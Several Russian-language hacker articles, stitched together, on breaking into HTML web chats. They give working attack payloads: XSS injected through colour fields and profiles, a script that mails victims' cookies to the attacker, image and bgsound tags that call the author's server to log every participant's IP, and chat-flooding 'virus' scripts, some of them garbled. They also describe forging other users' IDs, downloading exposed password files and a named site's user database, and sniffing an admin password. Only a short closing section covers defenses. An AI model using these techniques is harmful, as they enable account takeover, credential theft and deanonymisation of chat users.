Я предполагаю, что читатель знает, что такое CGI, и на этом построю своё объяснение. Начал я с малого. В любом чате фрейм, в котором ты пишешь сообщения, генерится динамически (для каждого входящего) и, возможно, содержит несколько скрытых полей. Типа <input type=hidden name=cookie value=SP202134> (так в партизанах хранится UserID) Идея в следующем: сохраняем содержимое этого фрейма на диске и исправляем его так, что бы можно было с ним работать со своего винта. Т.е. заменяем ссылки типа /cgi-bin/refresh.pl на полный путь www.chat.nsk.su/cgi-bin/refresh.pl и вместо скрытых полей формы пишем типа <input type=text name=cookie value=SP202134> (что бы можно было их изменять) После этого делаем HTML документ для "сборки чата" из кусков. Т.е. примерно так

   "First.htm"

<html>

<frameset rows="80%,20%">

   <frameset cols="70%,30%">

    <frame name="razg" src="http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+nocookie#end">

    <frame name="rigt" src="http://www.chat.nsk.su/right.html">

   </frameset>

   <frame name="bot" src="start.htm">

</frameset>

</html>

Start.htm - это и есть тот фрейм который я сохранил и изменил.
После этого я просто броузером открывал эту страницу (First.htm). И сразу(!!!) попадал в чат, минуя стандартную процедуру входа.
Это позволило :
1. Обходить зарегистрированные имена
2. Прятать свой IP от киллеров, за счет взятия чужого ID'a

Дальше мне стало интересно вычислить IP участников. Я обнаружил, что не запрещён тэг <bgsound src="">. Это позволило вставлять в своё сообщение ресурс со своей машины. Сам по себе звук на хер не нужен, но этот косяк позволил вставить в свой месс строку типа <bgsound src="http://MyIP/cgi-bin/spy.exe">. Этот скрипт (spy.exe) вызывался с машины КАЖДОГО участника чата. Это позволило увидеть IP всех (скрипт просто сохранял мне на винт данные из переменной окружения REMOTE_ADDR). Это мне не очень понравилось, тк не понятно было где чей IP. Примерно в это-же время в чате появились приваты. Это значит, что документ в главном фрейме (тот где мессы все) стал называться по другому.

До приватов :
http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor#end

После появления приватов :
http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+SP345678#end

Где SP456789 - UserID

После этого в скрипт (spy.exe) был добавлен вывод ID'a из переменной окружения HTTP_REFERER Ну а сопоставить ник с ID'ом не проблемма, тк ID каждого прописан там же примерно в такой строке

   <br><b><font color=yellow size=-1>Тут ник</font></b>

   <font color=black><a href="/cgi-bin/private_form.cgi?SP448188">

   <img src=/img/mes.gif border=0 vspace=0></a></font>

(Это строка взята из правого фрейма, где можно вызвать функцию "Кто в чате") После этого перестало быть проблемой сопоставление ника и IP. Затем я решил позабавиться с приватами. Используя метод сохранения странички на винт (описанный выше), я получил форму для отправления приватов от КОГО-ТО КОМУ-ТО. Т.е. я смог в отсылаемом приватно сообщении проставлять имя отправителя.

Осталось только одно. Я знал, что в чате есть киллеры, но ничего не знал про то, что это, где это, как это. Знал только, что для того, чтобы киллерствовать надо зайти на какую-то страничку. Очевидно, что в этой киллерской страничке показываются имена. Я предположил, что моё имя показываются таким, каким я его ввожу. Исходя из этого, я под именем <bgsound src="http://MyIP/cgi-bin/spy.exe"> MyNick зашел в чат (через прокси), и начал легонько ругаться (мне надо было, чтобы киллеры зашли на свою страничку). После этого (когда меня убили) я разгреб лог моего ВебСервера (OmniHTTPd beta) и увидел там обращение со страници не относящейся к известным мне страницам чата. Я полез на эту страницу и получил запрос на ввод пароля, со словами "Дорогой администратор...". Это приятно согрело душу. Дальше я начал думать, то ли подобрать пароль, то ли ещё что придумать. Но ситуация так сложилась, что я оказался в одной сети с киллером, и, запустив сниффер, я поимел пароль.

P.S. Ни один из этих приколов уже не работает в партизанах, т.к. это был "дружественный взлом" и обо всем, что я нашел, я рассказал создателю чата. Он все косяки исправил.

Еще раз о взломах HTML - чатов

Авторы: Этот e-mail адрес защищен от спам-ботов, для его просмотра у Вас должен быть включен Javascript

1. ЧАСТЬ ПЕРВАЯ, или показываем свое.
Основу интерфейса практически любого чата соствляют динамически генерируемые HTML-формы, связанные между собой посредством javascript. В практически всех чатах имя пользователя и пароль (или некий идентификатор, который генерируется при входе пользователя) хранятся внутри формы в качестве скрытого (hidden) элемента и могут извлекаются оттуда посредством скрипта. Заставив кого-либо из посетителей чата выполнить свой javascript, Вы можете, по сути, получить полный контроль над ним - сказать фразу от его имени или выдать его пароль.

Для человека, знающего хотя бы основы HTML и Javascript, не составит труда разобраться в структуре интерфейса чата, но вот подсунуть в эту структуру "троянский" скрипт - это проблема.

В простейшем случае, когда набираемый вами текст показывается в окне чата "как есть" - без какого-либо контроля - вы просто вводите текст вашего скрипта. Если возникает проблема с ограничением на длину строки - разбейте скрипт на несколько коротких функций.

Но в большинстве чатов все же имеется проверка, которая не дает ввод большинства "опасных" тегов, в т.ч. и <script>, либо запрещены теги вообще. Но тем не менее во многих случаях удается ее обойти. Ведь помимо тэга <SCRIPT> есть еще и казалось бы безобидные теги <A>, <IMG> <FORM> и другие, которые позволяют задать URL как javascript: или задать отклики объекта на события: OnClick, OnMouseOver и т.д.

Кроме того, теги могут проверяться в основном окне чата, но не контролироваться при вводе информации о пользователе. И можно вставить скрипт, например, в информацию о себе. Тогда тот участник чата, который имел неосторожность посмотреть вашу информацию получит вместо нее ваш скрипт. Например, следующий скрипт помещенный в личную информацию успешно работал на чате Copris (сейчас чат, похоже, накрылся, так что я смело его помещаю):

 <script>

 for( I=1 ; I<=11 ; I++ ){

  if( I==1 ) alert( "Че те надо?????" );

  else alert( "Я тя " + ( (I==11)? "последни" : I ) + "й раз спрашиваю - че те надо???" );

 }

 alert("а здесь все равно нету нифика...");

 top.frames['Inform'].document.forms[0].Accent.options[31].selected = 1;

 top.frames['Inform'].document.forms[0].Announce.value   =  "Я  люблю тебя, 3APA3A!";

 top.frames['Inform'].document.forms[0].submit();

 top.frames['Dark'].document.forms[2].submit();

 </script>

Этот безобидный скрипт дает alertы посетителю, после чего помещает признание любви к 3APA3е от имени посетителя в общее окно чата. Это стимулирует остальных посетителей на просмотр личной информации о 3APA3е. Тем не менее, скрипт можно было сделать и менее дружественным - например, посылать в приват пароль посетителя, который хранится в виде в виде скрытого элемента формы в каждом фрейме. Более того, можно было бы даже написать что-то типа вируса, который, например, меняет имя пользователя на "3APA3A" и ставит ему соответствующий пароль. Таким образом можно "заразить" всех участников чата. Изменение скрипта таким образом, чтобы высылать в приват пароль посетителя и превращать его в 3APA3у (при этом все его сообщения будут исходить от 3APA3ы, но видеть сообщения для нее он не будет), требовало ровно пять дополнительных строчек на javascript (три на первое действие и два на второе).

Похожая дыра присутствует в очень многих чатах, где посетителю позволяют выбрать цвет или размер текста. Как правило, вводимые им значения цвета не проверяются. Напрямую, или путем модификации странички, сохранив ее на диске (в том случае, если цвет предлагают не ввести и выбрать из набора), можно, например, в качестве цвета вместо любимого значения 'black' задать '><script' (если таг печатается в чате как <FONT COLOR=black> Если печатаются кавычки (COLOR="black"), то задача несильно усложняется - надо всего лишь их нейтрализовать, например '"><script p="'.

Как правило, тип шрифта указывается непосредственно перед фразой введенной посетителем. Так что в своей фразе вы теперь смело можете писать любой скрипт! Так мы имеем возможность закинуть Javascript в общее окно чата, что открывает обширные возможности... Но, нужно отметить, что засунуть закрывающий таг тоже может быть достаточно сложно, а без этого скрипт работать не будет. Впрочем, иногда скрипт просто удается засунуть в COLOR целиком.

2. ЧАСТЬ ВТОРАЯ, или смотрим чужое.
И, наконец, существует несколько способов простого хищения паролей из чатов. Если чат расположен на сервере apache, и проверяет имена пользователей по файлу htpasswd (при этом ваш браузер выкидывает окошко с предложением ввести имя и пароль для доступа к ресурсу), то всегда есть вероятность, что нерадивые администраторы положили его в доступный каталог. Можно для этого воспользоваться URL типа http://www.somechat.com/chat/.htpasswd. Точное расположение файла можно узнать стянув файл .htaccess из данной директории. Это, обычно не удается. Но часто удается стянуть его копию, которая осталась с последнего редактирования файла, например http://www.somechat.com/chat/.htaccess~ или http://www.somechat.com/chat/.htaccess.old (в том случае, если копии этих файлов любезно оставлены администратором).

Если чат расположен на Микрософтовском сервере и использует ODBC для доступа к базе данных паролей, то можно попытаться стянуть файл с базой, например если она имеет формат Microsoft Access и хранится в том же каталоге, то достаточно просто угадать ее имя, чтобы получить полную информацию обо всех пользователях вместе с паролями :) Классический пример - чат "Пластилин" (я уже послал уведомление администраторам чата): http://www.plastilin.nnov.ru/talkzone/talkzone.mdb

Следует сразу заметить, что почти все сказанное выше справедливо не только для HTML-чатов, но и для других WEB-сервисов, таких как доски объявлений (WWW-boards) или гостевые книжки (Guestbooks).

Ломаем чаты

Автор: Этот e-mail адрес защищен от спам-ботов, для его просмотра у Вас должен быть включен Javascript

Вы хотите зафлудить чей-то чат и не знаете как это зделать . Есть ситуации в которых очень опасно выходить , даже под проксиком , в чате который вы наметили для атаки . вам нужно нетолько скрыть свой ip но и вообще не непоказываться там !!! Есть несколько вариантов. Этот вариант предпологает наличие другого чата , также с дырками . Вариант просто обалденный !!! Вы пишете скриптец , который первым делом перелазит в дырку которую вы нашли у всех клиентов . И при каждой отправки пользователем сообщения ,поподает опять в чат. Таким образом вы пишете что-то типа чат вируса . Но размножение это не главное !!! Главное , что при каждом Refrash скрипт отсылает сообеие в чат который вы для атаки . Особенность это действенно кода вы сообаете оба чата !!! То есть Вы пишите скрипт который отпровляет себя в друой чат и отпровляет себя в свой чат , и выполняет действия . В этом случае если появится опять!!! Как только в друой чат войдёт клиент !!! :)

Примеры скриптов:
<iframe neme=frm width=0 heght=0></iframe>
<script>
frm.lpcation='www.???.ru/cgi-din/chat/chat.cgi?actin=message&nik=?&pass=?&color=?&msg=Hi!';
</sript>

-=[ ну ладно так и быть покажу вам скрипт с никами ]=-

<iframe neme=frm width=0 heght=0></iframe>
<scrpt>
function createArray(num) {
this.lengthv = num;
for(vari = 1; i<=num; i++)
this[i] = ';
}
var sel=Math.round(Math.round()*2+1)
var nik = new ceaeArray(2);
var pass = new ceaeArray(2);
nik[1]='nik1';
pass[1]='123';
nik[2]='nik2';
pass[2]='123'
frm.lpcation='www.???.ru/cgi-din/chat/chat.cgi?actin=message&nik='+nik[se1]
+'&pass='+pass[se1]+'&color=???&msg=Hi!';
</sript>

примечания:
Скрипт должен быть обьединён в одну строку!!!

Всем прет!!! Хотелось бы все-таки... извиниться перед не того ожидавшей аудиторией - вся проблема, честно говоря, состоит всего лишь в том, что эта статья (предыдущую имею в виду) для печати не предназначалась!!! Это была "проба пера", проверка стиля написания, так что, в принципе, все упреки безосновательны по причине того, что я не знал даже, что эта статья будет напечатана... Как так получилось: лежала мило она в папочке "Наброски", и вдруг в папке "Отправленные" Аутлука вижу письмо на адрес Этот e-mail адрес защищен от спам-ботов, для его просмотра у Вас должен быть включен Javascript с вложенным файликом "Попытка не пытка, или пытаемся узнать Ip в html-чате"!!! Потом оказалось - старший братик "пошутил"... Ну я сразу на сайт, а там... упасть не встать... чуть в самом деле не упал... Ну да ладно - назвался грибом - полезай в корзину, взялся за гуж - не говори - не дюж, от меня не убыло, от своего авторства не отказываюсь... Придется теперь писать про чаты... Итак - обещанная вторая статья про то, как узнать IP в html-чате и еще несколько приколов из той же серии (напоминаю, первоначальное название редакция изменила)

Но для начала еще немного про предыдущую статью... Почитал, говорю, я отзывы - и честно скажу: не обрадовали они меня... Пришлось самому отзыв на отзывы печатать, а это дело гнилое - ругаться с читателями... Ладно, сам виноват, надо было статьи писать не про чаты, а про определение ОСи или DoS-атаки... Социнженерия видно нынче не в почете...=(( А все-таки зря!!! Вдумайтесь: то что вы называете ламерской методикой, реально ни разу меня не подвело (так же как и сниффер, который кто-то там грозился написать - есть у меня свой, да и хакзоновский или любой другой юзать можно=), зато плюсов целая куча: меня ни разу не выкинули из чата, ни разу не убили, ни разу я ни с кем не ругался, если сам этого не хотел... Тем более что защита от большинства чат-снифферов предельно проста - либо намертво отрубить отображение картинок в свойствах Эксплорера, либо запретить для отображения все "прозрачные" теги (на некоторых чат-серваках это можно делать лично для себя)... А против головы, батеньки, нет приема, кроме другой головы, так что тут вопрос только в том, кто умнее и хитрее... Вы называете эту технологию ламерской, но вы сначала попробуйте добиться того, чтоб таким макаром получать IP хотя бы от 50% выбранных жертв... Вот тогда и скажите, что это раз плюнуть - развести "жертву" так, чтоб она сама без подозрений практически отдала вам в руки свой IP... Кто-то там, помню, говорил, что мол чего челу стоит отправить письмо, уйти и снова прийти? А что челу стоит после использования сниффера также уйти и зайти??? И еще - кто-то сказал, что эта методика рассчитана только на лохов - дык товарисчи, ваше дело и состоит в том, чтоб чел не догадался, что он лох, но стал бы им, хоть на время... Можно HDoS даже применить, но в рамках чата это трудновато. Так что - думайте сами, решайте сами... Ну а теперь, Федя, о главном=)) Поехали!

Предыстория
После обзора статей, посвященных взлому чатов, и почти четырехчасового лазанья по ссылкам, выданных родным Яндексом, я был немало обескуражен - на комбинацию слов "чат+взлом" система выдала мне больше 10000 ссылок... Когда я просмотрел 20 страниц, мне стало совсем плохо и я поставил перед собой тазик - реально из 100 ссылок я получил 6 (!!!!!) нормальных статей, первоначальное авторство которых было сложно установить... Тазик пригодился мне в первый раз... Возможно особо одаренные кул хацкеры бросятся проверить мой опыт и гордо воскликнут в мессаге "Брешешь, ламер, там их 10!!!", но это ничего не изменит... Все статьи - как под копирку. Когда я вчитался в содержание всех остальных статей, тазик пригодился второй раз... Я бы никогда не догадался, что вывод мата сквозь автоматическую систему фильтрации можно считать взломом чата!!! Периодически меняя тазики, я опытным путем добрался-таки до зерен истины, и... не обнаружил там для себя ничего нового!!! За прошедшие с моей последней попытки поинтересоваться взломом чатов полгода не добавилось ни одной нормальной новой статьи про взлом чатов, а уж про определение IP тем более... Тогда-то я и решился исправить это упущение.

Введение
До того, как рассмотреть нижеследующее, я хотел бы рассказать еще кое-что о чатах. На этот раз это будет не описанное в предыдущей статье физичекое устройство, а скорее факторы риска. Итак, на мой взгляд, все чаты можно разделить по уровню защиты на 4 уровня:

1) Админа нет вообще - делайте что хотите=)

2) Админ вроде и есть, но фиговый или временно ушел покурить - аналогично, но побыстрее, пока он не вернулся или до него не дошло, что вы там собираетесь делать;)

3) Админ есть, но защита слабовата - рисует только IP - юзайте анонимную проксю и меняйте ее, если что нехорошее случится...

4) Админ есть, защита сильна - рисует вдобавок к IP и домен... Это не есть карашоу, это тяжелее... Но в принципе решается это дело тоже до гениального просто - подключаетесь через другого провайдера (через связь которого вас не выкидывали), заходите на сайт, отключаетесь и подключаетесь снова через первого. Все будет нормалек, а если вдруг опять выкинут - просто повторите всю шутку заново=) И еще - если что-то все-таки произошло и в чат вас не пускают никаким образом - попробуйте подчистить кукисы=)

Обзор вариантов западла в чатах.
Основным методом взлома чатов является сохранение той формы, которую вы видите, заходя на сервак, на собственный хард, и изменения формы путем прописки полных адресов и замены строк типа <input type=hidden name= cookie value=SP202134> на <input type=text name=cookie value=SP202134> и последующей сборки окна чата из реальных и сохраненных фреймов.

Делается это обычно так:

<html>
<frameset rows="80%,20%">
<frameset cols="70%,30%">
<frame name="razg" src="http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+nocookie#end">
<frame name="rigt" src="http://www.chat.nsk.su/right.html">
</frameset>
<frame name="bot" src="start.htm">
</frameset>
</html>

Что это дает??? Возможность обойти зарегистрированные имена и сокрытие своего IP за чужим ID от киллеров. В дальнейшем над этой формой надо еще слегка поизвращаться и довести ее до ума, чтоб сделать отправку скриптов в общий фрейм легкой и приятной... Да, кстати, одной из возможных фенек является прописка скрипта в информацию о себе, которую вы даете при регистрации... Представьте только, как здорово - вы просто регистрируетесь, а каждый чел, который захочет глянуть вашу анкету, получает широкий спектр возможных подлянок - от простого захламления Рабочего стола ненужными окошками до впаривания трояна (где-то посерединке находится и получение IP или кукисов=) для примера привожу известный всем (вдруг не всем?) скрипт ЗАРАЗЫ aka Ученого Кота:

<script>
for( I=1 ; I<=11 ; I++ )
{
if( I==1 ) alert( "Че те надо?????" )
;
else alert( "Я тя " + ( (I==11)? "последни" : I ) + "й раз спрашиваю - че те надо???" );
}
alert("а здесь все равно нету нифика...");
top.frames['Inform'].document.forms[0].Accent.options[31].selected = 1;
top.frames['Inform'].document.forms[0].Announce.
value = "Я люблю тебя, 3APA3A!";
top.frames['Inform'].document.forms[0].submit();
top.frames['Dark'].document.forms[2].submit();
</script>

Путем нехитрой модификации скрипта можно добиться поразительных результатов... Но признаюсь - я прописать скрипт в анкету не пробовал - тем более что дырка эта уже почти везде закрыта и регистрационные анкеты сначала просматривают админы...Есть еще одна интересная штука:

<script language=javascript>
var cook=show_all_cookies();
document.open("cookies",cook);
document.write('<form onsubmit="javascript:window.close();"
method=post action="mailto: Этот e-mail адрес защищен от спам-ботов, для его просмотра у Вас должен быть включен Javascript "
ENCTYPE="text/plain"><input type=hidden
name=h1 value=',cook,'><input type=submit value="Нажмите чтобы закрыть">
</form>');
document.close("cookies");
</SCRIPT>

Как вы наверняка поняли, это заподло, посылающее кукисы вашей жертвы вам на мыло, попробуйте оптимизировать его. Кукисы - это вещь, там хранится и IP жертвы, и ID в чате, и много всего остального, полезного-преполезного=)) Но, кстати, есть один минус - вы светите свое мыло (в примере, как вы поняли, Этот e-mail адрес защищен от спам-ботов, для его просмотра у Вас должен быть включен Javascript )

Модифицируют форму обычно следующим образом: в очень многих чатах, где посетителю позволяют выбрать цвет или размер текста, как правило, вводимые им значения цвета не проверяются, можно, например, в качестве цвета вместо любимого значения 'black' задать '><script' (если тег печатается в чате как <FONT COLOR=black> Если печатаются кавычки (COLOR="black"), то задача несильно усложняется - надо всего лишь их нейтрализовать, например '"><script p="'=) Как правило, тип шрифта указывается непосредственно перед фразой введенной посетителем. Так что в своей фразе вы теперь смело можете писать любой скрипт! Так мы имеем возможность закинуть Javascript в общее окно чата, что открывает обширные возможности... Но нужно отметить что засунуть закрывающий тег тоже может быть достаточно сложно, а без этого скрипт работать не будет. Впрочем, иногда скрипт просто удается засунуть в COLOR целиком.

Итак, путем, предназначенным для заподлянства в чате, в том числе и кражи IP, служит использование разрешенных тегов (в большинстве чатов теги вроде <script> естейственно запрещены, и обычно отправка скрипта осуществляется путем использования тега BGSOUND, EMBED, OBJECT, DIV и т.д., обычно это выглядит так: <IMG src="*****.js">)для своих темных целей;-) Именно таким путем работают снифферы, например знаменитый чат-сниффер хакзоны, да и мои недалеко ушли, с той только разницей, что лог ведется в другом месте... Самым простым способом является указание на чей-нибудь сниффер в теге SRC непосредственно в общем окне (как все помнят, данный тег выполняется на машине, никого не спрашивая, если только просмотр картинок не отключен) - и все IP у вас в кармане. Рекомендую - зайдите на какой-нибудь простенький, но со вкусом чат, покопайтесь в исходнике фреймов, все что можно слейте себе на хард, полистайте книги и напишите свой сниффер - как гласит одно из определений словечка "хакер" - это такой странный человек, которому больше нравится писать свои программы, чем использовать чужие=) Именно по этой причине я не даю ни одной ссылки на существующие в сети снифферы и не даю окончательных, применяемых мной вариантов приведенных скриптов - дорабатывайте сами, труд, батенька, облагораживает человека, нужно учиться, учиться и еще раз учиться, как завещал великий Ленин, а не переписывать чужие скрипты - это вам в голове ничего не прибавит... Мне конечно скриптов не жалко, но разозлили меня откликами на предыдущую статью (набросок имею в виду, где я оказался ЛАМЕРом aka ДЕБИЛом=) порядком, так что звиняйте, хлопцы, бананьев нэма... Но, все-таки, если людям захочется - я ОБЕЩАЮ третью статью, где опубликую все окончательные результаты МОИХ исследований на тему взломов чата и защиты в чате (здесь же и ИРКа будет, наверно, приплетена, идеи и наброски на эту тему уже есть...)Так что думайте. А пока продолжаем.

Многих интересует вопрос - а почему сниффера или трояна обычно запускают из сети, а не с своего компьютера? Нельзя, мол, что ли??? Можно!!! Адрес для запуска должен выглядеть так: 127.0.0.1/c:\bo.exe где, что и ежу понятно, 127.0.0.1 - IP компа, у которого прямо на диске С хранится ваш любимый BO... Аналогично может впариваться любая другая примочка, включая скрипты и все прочее... Вот так вот.

Теперь несколько слов о том, как защититься от всего того, что я тут расписал - прежде всего, перед заходом на чат отключите отображение картинок, если кто не знает как - в IE Сервис\Свойства обозревателя\Вкладка "Дополнительно", в разделе "Мультимедиа" снять галочку с "Отображать рисунки" - вы ничего не потеряете, в нужное время нужную картинку можно легко рассмотреть, кликнув правой кнопкай и выбрав "Показать рисунок". Во-вторых - не ходите на ссылки, которые вам дают в чате, если не уверены на 100%, что это именно то, что вам нужно. В-третьих - юзайте анонимную проксю. В-четвертых - если возможно, то отключите для отображения все теги, с помощью которых на вашей машине может быть запущен скрипт. В-пятых - пользуйтесь презервативами... ой, кажется это из другой оперы!;-)

Это был КРАТКИЙ обзор информации по западлу и узнаванию IP в чате - уровень чуть выше, чем в предыдущей статье, главное знать html и javascript хотя бы на начальном уровне. Если поступят нормальные отклики на эту статью, то будет проведена серьезная исследовательская работа, распотрошена пара фирменных (моих=) скриптов и снифферов, приведены примеры конкретных взломов и т.д. - но на это должно уйти много времени, предупреждаю сразу. Поэтому следующая моя статья будет посвящена чему-нибудь имеющему более близкое отношение к хакингу - либо проблемам определения ОСи на удаленной машине (вручную=), либо DoS-атакам, либо... вообще не будет никакой статьи=) - все зависит, как всегда, от вашей реакции... В общем пишите на сайте отзывы - обязательно буду учитывать! Заранее благодарен за отзывы типа "Тоже херовенько, но явно лучше, чем в прошлый раз=)"!!!